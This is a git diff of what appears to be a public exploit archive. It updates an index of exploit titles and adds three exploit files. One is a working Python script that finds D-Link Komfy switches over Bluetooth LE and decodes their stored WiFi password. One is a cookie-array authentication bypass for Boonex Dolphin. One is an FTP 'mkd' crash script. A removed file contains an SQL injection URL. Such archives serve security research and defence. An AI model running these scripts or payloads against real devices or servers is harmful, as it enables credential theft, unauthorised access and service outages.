DLL Planting with 'comsvcs.dll' Delay Load of 'mqrt.dll' (MS15-132)",2015-12-14,"Google Security Research",windows,remote,0 38969,platforms/multiple/dos/38969.txt,"Adobe Flash - Type Confusion in IExternalizable.readExternal When Performing Local Serialization",2015-12-14,"Google Security Research",multiple,dos,0 38970,platforms/multiple/dos/38970.txt,"Adobe Flash - Type Confusion in Serialization with ObjectEncoder.dynamicPropertyWriter",2015-12-14,"Google Security Research",multiple,dos,0 38971,platforms/hardware/webapps/38971.txt,"Polycom VVX-Series Business Media Phones - Directory Traversal",2015-12-14,"Jake Reynolds",hardware,webapps,80 @@ -35574,8 +35573,8 @@ id,file,description,date,author,platform,type,port 39229,platforms/linux/dos/39229.cpp,"Grassroots DICOM (GDCM) 2.6.0 and 2.6.1 - ImageRegionReader::ReadIntoBuffer Buffer Overflow",2016-01-12,"Stelios Tsampas",linux,dos,0 39230,platforms/linux/local/39230.c,"Linux Kernel 4.3.3 - 'overlayfs' Privilege Escalation (2)",2016-01-12,halfdog,linux,local,0 39231,platforms/asp/webapps/39231.py,"WhatsUp Gold 16.3 - Unauthenticated Remote Code Execution",2016-01-13,"Matt Buzanowski",asp,webapps,0 -39232,platforms/windows/dos/39232.txt,"Microsoft Windows devenum.dll!DeviceMoniker::Load() - Heap Corruption Buffer Underflow (MS16-007)",2016-01-13,"Google Security Research",windows,dos,0 -39233,platforms/windows/dos/39233.txt,"Microsoft Office - COM Object DLL Planting with WMALFXGFXDSP.dll (MS16-007)",2016-01-13,"Google Security Research",windows,dos,0 +39232,platforms/windows/dos/39232.txt,"Microsoft Windows = devenum.dll!DeviceMoniker::Load() Heap Corruption Buffer Underflow (MS16-007)",2016-01-13,"Google Security Research",windows,dos,0 +39233,platforms/windows/dos/39233.txt,"Microsoft Office - COM Object DLL Planting with 'WMALFXGFXDSP.dll' (MS16-007)",2016-01-13,"Google Security Research",windows,dos,0 39234,platforms/php/webapps/39234.py,"SevOne NMS 5.3.6.0 - Remote Root Exploit",2016-01-14,@iamsecurity,php,webapps,80 39235,platforms/multiple/webapps/39235.txt,"Manage Engine Applications Manager 12 - Multiple Vulnerabilities",2016-01-14,"Bikramaditya Guha",multiple,webapps,9090 39236,platforms/multiple/webapps/39236.py,"Manage Engine Application Manager 12.5 - Arbitrary Command Execution",2016-01-14,"Bikramaditya Guha",multiple,webapps,0 @@ -35805,7 +35804,7 @@ id,file,description,date,author,platform,type,port 39472,platforms/windows/dos/39472.txt,"STIMS Cutter 1.1.3.20 - Buffer Overflow Denial of Service",2016-02-19,"Shantanu Khandelwal",windows,dos,0 39473,platforms/php/webapps/39473.txt,"Chamilo LMS IDOR - (messageId) Delete POST Inject",2016-02-19,Vulnerability-Lab,php,webapps,0 39474,platforms/php/webapps/39474.txt,"Chamilo LMS - Persistent Cross-Site Scripting",2016-02-19,Vulnerability-Lab,php,webapps,0 -39475,platforms/windows/dos/39475.py,"QuickHeal 16.00 - webssx.sys Driver Denial of Service",2016-02-19,"Fitzl Csaba",windows,dos,0 +39475,platforms/windows/dos/39475.py,"QuickHeal 16.00 - 'webssx.sys' Driver Denial of Service",2016-02-19,"Fitzl Csaba",windows,dos,0 39476,platforms/multiple/dos/39476.txt,"Adobe Flash - SimpleButton Creation Type Confusion",2016-02-19,"Google Security Research",multiple,dos,0 39477,platforms/windows/webapps/39477.txt,"ManageEngine Firewall Analyzer 8.5 - Multiple Vulnerabilities",2016-02-19,"Sachin Wagh",windows,webapps,8500 39478,platforms/php/webapps/39478.txt,"SOLIDserver <= 5.0.4 - Local File Inclusion",2016-02-20,"Saeed reza Zamanian",php,webapps,0 @@ -35837,7 +35836,7 @@ id,file,description,date,author,platform,type,port 39505,platforms/linux/dos/39505.c,"Linux io_submit L2TP sendmsg - Integer Overflow",2016-02-26,"Google Security Research",linux,dos,0 39506,platforms/php/webapps/39506.txt,"Joomla! Extension JSN Poweradmin 2.3.0 - Multiple Vulnerabilities",2016-02-26,"RatioSec Research",php,webapps,80 39507,platforms/php/webapps/39507.txt,"WordPress Plugin More Fields 2.1 - Cross-Site Request Forgery",2016-02-29,"Aatif Shahdad",php,webapps,80 -39508,platforms/windows/local/39508.ps1,"Comodo Anti-Virus - SHFolder.dll Local Privilege Elevation Exploit",2016-02-29,Laughing_Mantis,windows,local,0 +39508,platforms/windows/local/39508.ps1,"Comodo Anti-Virus - 'SHFolder.dll' Local Privilege Elevation Exploit",2016-02-29,Laughing_Mantis,windows,local,0 39509,platforms/windows/dos/39509.txt,"Crouzet em4 soft 1.1.04 - '.pm4' Integer Division By Zero",2016-03-01,LiquidWorm,windows,dos,0 39510,platforms/windows/local/39510.txt,"Crouzet em4 soft 1.1.04 and M3 soft 3.1.2.0 - Insecure File Permissions",2016-03-01,LiquidWorm,windows,local,0 39512,platforms/windows/dos/39512.txt,"Viscomsoft Calendar Active-X 2.0 - Multiple Crashes (PoC)",2016-03-01,"Shantanu Khandelwal",windows,dos,0 @@ -35885,8 +35884,8 @@ id,file,description,date,author,platform,type,port 39557,platforms/windows/dos/39557.py,"Zortam Mp3 Media Studio 20.15 - SEH Overflow Denial of Service",2016-03-14,INSECT.B,windows,dos,0 39558,platforms/php/webapps/39558.txt,"WordPress Plugin Site Import 1.0.1 - Local File Inclusion / Remote File Inclusion",2016-03-14,Wadeek,php,webapps,80 39559,platforms/php/webapps/39559.txt,"TeamPass 2.1.24 - Multiple Vulnerabilities",2016-03-14,"Vincent Malguy",php,webapps,80 -39560,platforms/windows/dos/39560.txt,"Microsoft Windows - Kernel ATMFD.dll OTF Font Processing Pool-Based Buffer Overflow (MS16-026)",2016-03-14,"Google Security Research",windows,dos,0 -39561,platforms/windows/dos/39561.txt,"Microsoft Windows - Kernel ATMFD.dll OTF Font Processing Stack Corruption (MS16-026)",2016-03-14,"Google Security Research",windows,dos,0 +39560,platforms/windows/dos/39560.txt,"Microsoft Windows - Kernel 'ATMFD.dll' OTF Font Processing Pool-Based Buffer Overflow (MS16-026)",2016-03-14,"Google Security Research",windows,dos,0 +39561,platforms/windows/dos/39561.txt,"Microsoft Windows - Kernel 'ATMFD.dll' OTF Font Processing Stack Corruption (MS16-026)",2016-03-14,"Google Security Research",windows,dos,0 39562,platforms/windows/dos/39562.html,"Microsoft Internet Explorer - Read AV in MSHTML!Layout::LayoutBuilderDivider::BuildPageLayout (MS16-023)",2016-03-14,"Google Security Research",windows,dos,0 39564,platforms/perl/webapps/39564.txt,"AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection",2016-03-16,BrianWGray,perl,webapps,443 39565,platforms/windows/dos/39565.txt,"Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow",2016-03-16,LiquidWorm,windows,dos,0 @@ -36022,7 +36021,7 @@ id,file,description,date,author,platform,type,port 39710,platforms/php/webapps/39710.txt,"modified eCommerce Shopsoftware 2.0.0.0 rev 9678 - Blind SQL Injection",2016-04-19,"Felix Maduakor",php,webapps,80 39711,platforms/php/webapps/39711.php,"PHPBack 1.3.0 - SQL Injection",2016-04-20,hyp3rlinx,php,webapps,80 39712,platforms/win_x86-64/dos/39712.txt,"Microsoft Windows - Kernel DrawMenuBarTemp Wild-Write (MS16-039)",2016-04-20,"Nils Sommer",win_x86-64,dos,0 -39713,platforms/windows/dos/39713.c,"Hyper-V - vmswitch.sys VmsMpCommonPvtHandleMulticastOids Guest to Host Kernel-Pool Overflow",2016-04-20,"Google Security Research",windows,dos,0 +39713,platforms/windows/dos/39713.c,"Hyper-V - 'vmswitch.sys' VmsMpCommonPvtHandleMulticastOids Guest to Host Kernel-Pool Overflow",2016-04-20,"Google Security Research",windows,dos,0 39714,platforms/php/webapps/39714.txt,"phpLiteAdmin 1.9.6 - Multiple Vulnerabilities",2016-04-21,"Ozer Goker",php,webapps,80 39715,platforms/java/webapps/39715.rb,"Symantec Brightmail 10.6.0-7 - LDAP Credentials Disclosure (Metasploit)",2016-04-21,"Fakhir Karim Reda",java,webapps,443 39716,platforms/hardware/webapps/39716.py,"Gemtek CPE7000 / WLTCS-106 - Multiple Vulnerabilities",2016-04-21,"Federico Ramondino",hardware,webapps,443 @@ -36050,7 +36049,7 @@ id,file,description,date,author,platform,type,port 39740,platforms/windows/dos/39740.cpp,"Microsoft Windows - CSRSS BaseSrvCheckVDM Session 0 Process Creation Privilege Escalation (MS16-048)",2016-04-27,"Google Security Research",windows,dos,0 39741,platforms/osx/local/39741.txt,"Mach Race OSX - Privilege Escalation",2016-04-27,fG!,osx,local,0 39742,platforms/php/remote/39742.txt,"PHP 7.0.5 - ZipArchive::getFrom* Integer Overflow",2016-04-28,"Hans Jerry Illikainen",php,remote,0 -39743,platforms/windows/dos/39743.txt,"Microsoft Windows - Kernel win32k.sys TTF Processing EBLC / EBSC Tables Pool Corruption (MS16-039)",2016-04-28,"Google Security Research",windows,dos,0 +39743,platforms/windows/dos/39743.txt,"Microsoft Windows - Kernel 'win32k.sys' TTF Processing EBLC / EBSC Tables Pool Corruption (MS16-039)",2016-04-28,"Google Security Research",windows,dos,0 39744,platforms/php/webapps/39744.html,"Observium 0.16.7533 - Cross-Site Request Forgery",2016-04-29,"Dolev Farhi",php,webapps,80 39745,platforms/php/webapps/39745.txt,"Observium 0.16.7533 - Authenticated Arbitrary Command Execution",2016-04-29,"Dolev Farhi",php,webapps,80 39746,platforms/cgi/webapps/39746.txt,"Merit Lilin IP Cameras - Multiple Vulnerabilities",2016-04-29,Orwelllabs,cgi,webapps,80 @@ -36132,13 +36131,13 @@ id,file,description,date,author,platform,type,port 39825,platforms/multiple/dos/39825.txt,"Adobe Flash - Out-of-Bounds Read when Placing Object",2016-05-17,"Google Security Research",multiple,dos,0 39826,platforms/multiple/dos/39826.txt,"Adobe Flash - Overflow in Processing Raw 565 Textures",2016-05-17,"Google Security Research",multiple,dos,0 39827,platforms/multiple/dos/39827.txt,"Adobe Flash - Heap Overflow in ATF Processing (Image Reading)",2016-05-17,"Google Security Research",multiple,dos,0 -39828,platforms/multiple/dos/39828.txt,"Adobe Flash - MP4 File Stack Corruption",2016-05-17,"Google Security Research",multiple,dos,0 +39828,platforms/multiple/dos/39828.txt,"Adobe Flash - .MP4 File Stack Corruption",2016-05-17,"Google Security Research",multiple,dos,0 39829,platforms/multiple/dos/39829.txt,"Adobe Flash - Type Confusion in FileReference Constructor",2016-05-17,"Google Security Research",multiple,dos,0 39830,platforms/multiple/dos/39830.txt,"Adobe Flash - addProperty Use-After-Free",2016-05-17,"Google Security Research",multiple,dos,0 39831,platforms/multiple/dos/39831.txt,"Adobe Flash - SetNative Use-After-Free",2016-05-17,"Google Security Research",multiple,dos,0 -39832,platforms/windows/dos/39832.txt,"Microsoft Windows - gdi32.dll Multiple Issues in the EMF CREATECOLORSPACEW Record Handling (MS16-055)",2016-05-17,"Google Security Research",windows,dos,0 -39833,platforms/windows/dos/39833.txt,"Microsoft Windows - gdi32.dll Multiple Issues in the EMF COMMENT_MULTIFORMATS Record Handling (MS16-055)",2016-05-17,"Google Security Research",windows,dos,0 -39834,platforms/multiple/dos/39834.txt,"Microsoft Windows - gdi32.dll Heap Based Buffer Overflow in ExtEscape() Triggerable via EMR_EXTESCAPE EMF Record (MS16-055)",2016-05-17,"Google Security Research",multiple,dos,0 +39832,platforms/windows/dos/39832.txt,"Microsoft Windows - 'gdi32.dll' Multiple Issues in the EMF CREATECOLORSPACEW Record Handling (MS16-055)",2016-05-17,"Google Security Research",windows,dos,0 +39833,platforms/windows/dos/39833.txt,"Microsoft Windows - 'gdi32.dll' Multiple Issues in the EMF COMMENT_MULTIFORMATS Record Handling (MS16-055)",2016-05-17,"Google Security Research",windows,dos,0 +39834,platforms/multiple/dos/39834.txt,"Microsoft Windows - 'gdi32.dll' Heap Based Buffer Overflow in ExtEscape() Triggerable via EMR_EXTESCAPE EMF Record (MS16-055)",2016-05-17,"Google Security Research",multiple,dos,0 39835,platforms/multiple/dos/39835.txt,"Symantec/Norton AntiVirus - ASPack Remote Heap/Pool Memory Corruption",2016-05-17,"Google Security Research",multiple,dos,0 39836,platforms/multiple/remote/39836.rb,"Dell SonicWALL Scrutinizer 11.01 - methodDetail SQL Injection (Metasploit)",2016-05-17,Metasploit,multiple,remote,0 39837,platforms/java/webapps/39837.txt,"SAP xMII 15.0 - Directory Traversal",2016-05-17,ERPScan,java,webapps,0 @@ -36290,8 +36289,8 @@ id,file,description,date,author,platform,type,port 39987,platforms/php/webapps/39987.html,"IonizeCMS 1.0.8 - Cross-Site Request Forgery (Add Admin)",2016-06-21,s0nk3y,php,webapps,80 39988,platforms/php/webapps/39988.html,"Yona CMS - Cross-Site Request Forgery",2016-06-21,s0nk3y,php,webapps,80 39989,platforms/php/webapps/39989.txt,"Joomla! Component Publisher Pro (com_publisher) - SQL Injection",2016-06-21,s0nk3y,php,webapps,80 -39990,platforms/windows/dos/39990.txt,"Microsoft Windows - gdi32.dll Multiple DIB-Related EMF Record Handlers Heap Based Out-of-Bounds Reads/Memory Disclosure (MS16-074)",2016-06-21,"Google Security Research",windows,dos,0 -39991,platforms/windows/dos/39991.txt,"Microsoft Windows - Kernel ATMFD.dll NamedEscape 0x250C Pool Corruption (MS16-074)",2016-06-21,"Google Security Research",windows,dos,0 +39990,platforms/windows/dos/39990.txt,"Microsoft Windows - 'gdi32.dll' Multiple DIB-Related EMF Record Handlers Heap Based Out-of-Bounds Reads/Memory Disclosure (MS16-074)",2016-06-21,"Google Security Research",windows,dos,0 +39991,platforms/windows/dos/39991.txt,"Microsoft Windows - Kernel 'ATMFD.dll' NamedEscape 0x250C Pool Corruption (MS16-074)",2016-06-21,"Google Security Research",windows,dos,0 39992,platforms/linux/local/39992.txt,"Linux - ecryptfs and /proc/$pid/environ Privilege Escalation",2016-06-21,"Google Security Research",linux,local,0 39993,platforms/win_x86/dos/39993.txt,"Microsoft Windows - Custom Font Disable Policy Bypass",2016-06-21,"Google Security Research",win_x86,dos,0 39994,platforms/windows/dos/39994.html,"Microsoft Internet Explorer 11 - Garbage Collector Attribute Type Confusion (MS16-063)",2016-06-21,Skylined,windows,dos,0 @@ -36427,7 +36426,7 @@ id,file,description,date,author,platform,type,port 40161,platforms/java/webapps/40161.txt,"Micro Focus Filr 2 2.0.0.421_ Filr 1.2 1.2.0.846 - Multiple Vulnerabilities",2016-07-25,"SEC Consult",java,webapps,9443 40162,platforms/linux/remote/40162.rb,"Barracuda Web App Firewall 8.0.1.007/Load Balancer 5.4.0.004 - Authenticated Remote Root Exploit (Metasploit)",2016-07-26,xort,linux,remote,8000 40163,platforms/php/webapps/40163.txt,"PHP File Vault 0.9 - Directory Traversal",2016-07-26,N_A,php,webapps,80 -40164,platforms/multiple/local/40164.c,"VMware Virtual Machine Communication Interface (VMCI) vmci.sys - (PoC)",2013-03-06,"Artem Shishkin",multiple,local,0 +40164,platforms/multiple/local/40164.c,"VMware Virtual Machine Communication Interface (VMCI) - 'vmci.sys' (PoC)",2013-03-06,"Artem Shishkin",multiple,local,0 40165,platforms/cgi/webapps/40165.txt,"Iris ID IrisAccess ICU 7000-2 - Multiple Vulnerabilities",2016-07-26,LiquidWorm,cgi,webapps,80 40166,platforms/cgi/webapps/40166.txt,"Iris ID IrisAccess ICU 7000-2 - Remote Root Command Execution",2016-07-26,LiquidWorm,cgi,webapps,80 40167,platforms/linux/remote/40167.txt,"Iris ID IrisAccess iCAM4000/iCAM7000 - Hardcoded Credentials Remote Shell Access",2016-07-26,LiquidWorm,linux,remote,23 @@ -36490,7 +36489,7 @@ id,file,description,date,author,platform,type,port 40280,platforms/windows/remote/40280.py,"Microsoft Windows - 'srv2.sys' SMB Code Execution (Python) (MS09-050)",2016-02-26,ohnozzy,windows,remote,0 40281,platforms/cgi/webapps/40281.txt,"Vanderbilt IP-Camera CCPW3025-IR / CVMW3025-IR - Local File Disclosure",2016-08-22,"Yakir Wizman",cgi,webapps,0 40234,platforms/windows/remote/40234.py,"EasyFTP Server 1.7.0.11 - 'APPE' Command Buffer Overflow Remote Exploit",2012-03-03,Swappage,windows,remote,0 -40279,platforms/windows/remote/40279.py,"Microsoft Windows - NetAPI32.dll Code Execution (Python) (MS08-067)",2016-02-26,ohnozzy,windows,remote,0 +40279,platforms/windows/remote/40279.py,"Microsoft Windows - 'NetAPI32.dll' Code Execution (Python) (MS08-067)",2016-02-26,ohnozzy,windows,remote,0 40235,platforms/hardware/remote/40235.py,"Samsung Smart Home Camera SNH-P-6410 - Command Injection",2016-08-14,PentestPartners,hardware,remote,0 40236,platforms/ruby/webapps/40236.txt,"GitLab - 'impersonate' Feature Privilege Escalation",2016-08-15,Kaimi,ruby,webapps,80 40262,platforms/cgi/webapps/40262.txt,"SIEMENS IP Cameras (Multiple Models) - Credential Disclosure / Configuration Download",2016-08-19,"Todor Donev",cgi,webapps,80 @@ -36697,7 +36696,7 @@ id,file,description,date,author,platform,type,port 40590,platforms/xml/webapps/40590.txt,"Oracle BI Publisher 11.1.1.6.0 / 11.1.1.7.0 / 11.1.1.9.0 / 12.2.1.0.0 - XML External Entity Injection",2016-10-20,"Jakub Palaczynski",xml,webapps,0 40591,platforms/php/webapps/40591.txt,"Classifieds Rental Script - SQL Injection",2016-10-20,"Arbin Godar",php,webapps,0 40592,platforms/windows/dos/40592.py,"SAP NetWeaver KERNEL 7.0 < 7.5 - Denial of Service",2016-10-20,ERPScan,windows,dos,0 -40593,platforms/windows/dos/40593.py,"SAP Adaptive Server Enterprise 16 - Denial of Service",2016-10-20,ERPScan,windows,dos,0 +40593,platforms/windows/dos/40593.py,"SAP Adaptive Server Enterprise 16 - Denial of Service",2016-10-20,ERPScan,windows,dos,0 40594,platforms/php/webapps/40594.txt,"Event Calendar PHP 1.5 - SQL Injection",2016-10-20,"Ehsan Hosseini",php,webapps,0 40595,platforms/php/webapps/40595.txt,"SPIP 3.1.2 Template Compiler/Composer - PHP Code Execution",2016-10-20,Sysdream,php,webapps,80 40596,platforms/php/webapps/40596.txt,"SPIP 3.1.1 / 3.1.2 - File Enumeration / Path Traversal",2016-10-20,Sysdream,php,webapps,80 @@ -36726,3 +36725,6 @@ id,file,description,date,author,platform,type,port 40628,platforms/php/webapps/40628.pl,"EC-CUBE 2.12.6 - Server-Side Request Forgery",2016-10-24,Wadeek,php,webapps,0 40629,platforms/hardware/webapps/40629.txt,"Industrial Secure Routers EDR-810 / EDR-G902 / EDR-G903 - Insecure Configuration Management",2016-10-24,"Sniper Pex",hardware,webapps,0 40630,platforms/windows/local/40630.py,"Network Scanner 4.0.0 - SEH Local Buffer Overflow",2016-10-25,n30m1nd,windows,local,0 +40631,platforms/php/webapps/40631.txt,"Boonex Dolphin 7.3.2 - Authentication Bypass",2016-10-26,"Saadi Siddiqui",php,webapps,0 +40632,platforms/windows/dos/40632.py,"SmallFTPd 1.0.3 - 'mkd' Command Denial of Service",2016-10-26,ScrR1pTK1dd13,windows,dos,0 +40633,platforms/hardware/remote/40633.py,"Komfy Switch with Camera DKZ-201S/W - WiFi Password Disclosure",2016-10-26,"Jason Doyle",hardware,remote,0 diff --git a/platforms/hardware/remote/40633.py b/platforms/hardware/remote/40633.py new file mode 100755 index 000000000..6a0fe7fae --- /dev/null +++ b/platforms/hardware/remote/40633.py @@ -0,0 +1,62 @@ +#!/usr/bin/python +# Exploit Title: Komfy Switch with Camera Wifi Password Disclosure via Bluetooth BLE +# Date: Oct 13, 2016 +# Exploit Author: Jason Doyle @_jasondoyle +# Vendor Homepage: http://us.dlink.com/products/connected-home/komfy-switch-with-camera/ +# HW Model: DKZ-201S/W +# SW Version: 1.0 +# Tested on: Ubuntu 16.04 LTS / Python 2.7 +# Disclosure Timeline: 10/11/16 Reported vulnerability to D-Link +# 10/11/16 D-Link responded - The Komfy switch will be discontinued 12/30/16. No fix planned. + +# Vulnerability Summary +#It is possible for an unauthenticated, remote attacker to retrieve the Komfy device's associated wifi ssid and password over bluetooth (4.0/BLE). + +# Vulnerability Details +#https://github.com/jasondoyle/Komfy-Switch-Wifi-Password-Disclosure + + + +# Author: Jason Doyle @_jasondoyle +# Komfy Switch with Camera wifi password disclosure exploit script +import re, base64 +from bluepy.btle import Scanner +from gattlib import GATTRequester + +#lookup table to unscramble +base64Alphabet = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=" # '=' used for padding +komfy64Alphabet = "qazwersdfxcvbgtyhnmjklpoiu5647382910+/POIKLMJUYTGHNBVFREWSDCXZAQ$" # '$' used for padding + +scanner = Scanner() + +devices = scanner.scan(5.0) +bAddr = "" +for dev in devices: + if "6c:72:20" in dev.addr and dev.getValueText(1) and dev.getValueText(7) and dev.getValueText(9): + bAddr = dev.addr + print "[+] Komfy switch found: %s (%s), RSSI=%d dB" % (dev.addr, dev.addrType, dev.rssi) +if not bAddr: + print "No Komfy switches found" + sys.exit(1) + +req = GATTRequester(bAddr.encode('ascii','ignore'), False, 'hci0') +req.connect(True, 'public', 'none', 0, 78) + +#request SSID +wifiSsid = req.read_by_uuid("0xb006")[0] +reg = re.search(r"(:\s\"(.*)\")", wifiSsid) +wifiSsid = reg.groups()[1].replace("\\","") + +#request komfy encoded wifi password +wifiPassKomfy64 = req.read_by_uuid("0xb007")[0] +reg = re.search(r"(:\s\"(.*)\")", wifiPassKomfy64) +wifiPassKomfy64 = reg.groups()[1].replace("\\","") + +#convert password to real base64 +wifiPassBase64 = "" +for char in wifiPassKomfy64: + i = komfy64Alphabet.index(char) + wifiPassBase64 += base64Alphabet[i] + +wifiPass = base64.b64decode(wifiPassBase64) +print "[+] Wifi password found for Komfy Switch [%s] SSID: %s Password: %s" % (bAddr, wifiSsid, wifiPass) \ No newline at end of file diff --git a/platforms/php/webapps/35009.txt b/platforms/php/webapps/35009.txt deleted file mode 100755 index 503eda26d..000000000 --- a/platforms/php/webapps/35009.txt +++ /dev/null @@ -1,9 +0,0 @@ -source: http://www.securityfocus.com/bid/45003/info - -AuraCMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. - -Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. - -AuraCMS 1.62 is vulnerable; other versions may also be affected. - -http://www.example.com/pdf.php?id=140+AND+1=2+UNION+SELECT+ind0nesianc0der,1,2,3,4,5,6,7 \ No newline at end of file diff --git a/platforms/php/webapps/40631.txt b/platforms/php/webapps/40631.txt new file mode 100755 index 000000000..1e412a1f9 --- /dev/null +++ b/platforms/php/webapps/40631.txt @@ -0,0 +1,24 @@ +# Exploit Title : Boonex Dolphin all versoin <= 7.3 Authentication Bypass +# Exploit Author : Saadat Ullah saadi_linux[@]rocketmail.com +# Software Link : https://www.boonex.com +# Author HomePage : http://security-geeks.blogspot.com + + +Proof of Concept + +File: admin.inc.php +Line: 187 +Code: (strcmp($aProfile['Password'], $passwd) != 0) + +$passwd is equal to Cookie parameter memberpassword + +Bug: +According to PHP documentation strcmp will compare strings, but what if we provide an array??? + +So, simple bypass is to put two cookies in browser +memberID=1 +memberPassword[]=blah --->array + +This will allow the attacker to bypass the authentication and can also enter in admin panel. + +#Independent Pakistani Security Researcher \ No newline at end of file diff --git a/platforms/windows/dos/40632.py b/platforms/windows/dos/40632.py new file mode 100755 index 000000000..1e447f042 --- /dev/null +++ b/platforms/windows/dos/40632.py @@ -0,0 +1,28 @@ +from ftplib import FTP + +print ''' + ############################################## + # Created: ScrR1pTK1dd13 # + # Name: Greg Priest # + # Mail: ScrR1pTK1dd13.slammer@gmail.com # + ############################################## + + +# Exploit Title: smallftp_mkd_command_DoS_Exploit +# Date: 2016.10.26 +# Exploit Author: Greg Priest +# Version: smallftpd 1.0.3 +# Tested on: Windows XP, Windows 7 x64 + +''' + +ftp_ip = raw_input("FTP server IP:") +user = raw_input("username:") +password = raw_input("password:") +killercode = 'CRASH' * 100 +ftp = FTP(ftp_ip) +ftp.login(user, password) +print ftp.login +print "CRSAH CODE SENT!" +FTP.mkd(ftp, killercode) +